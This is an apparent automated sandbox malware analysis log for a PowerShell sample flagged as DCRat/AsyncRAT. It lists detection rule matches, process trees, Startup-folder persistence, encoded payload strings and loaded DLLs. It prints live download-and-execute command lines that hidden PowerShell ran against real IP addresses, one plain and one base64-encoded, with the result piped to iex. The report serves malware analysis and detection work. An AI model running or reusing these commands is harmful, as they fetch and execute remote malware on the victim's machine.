            Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: powershell.exe PID: 2180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 8.2.powershell.exe.8660000.8.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 8.2.powershell.exe.503a820.4.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: iacipmps.dll.9.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@28/23@0/2
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3642D CoCreateInstance,GetUserDefaultLCID,StringFromGUID2,wsprintfW,RegOpenKeyW,RegEnumKeyW,RegOpenKeyW,RegQueryValueExW,wsprintfW,RegCloseKey,RegCloseKey,5_2_00D3642D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.urlJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3032:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2972
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g0oggsa.xw4.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe
            Source: C:\Windows\Temp\Package.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Temp\Package.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgAJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exeJump to behavior
            Source: C:\Windows\Temp\Package.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
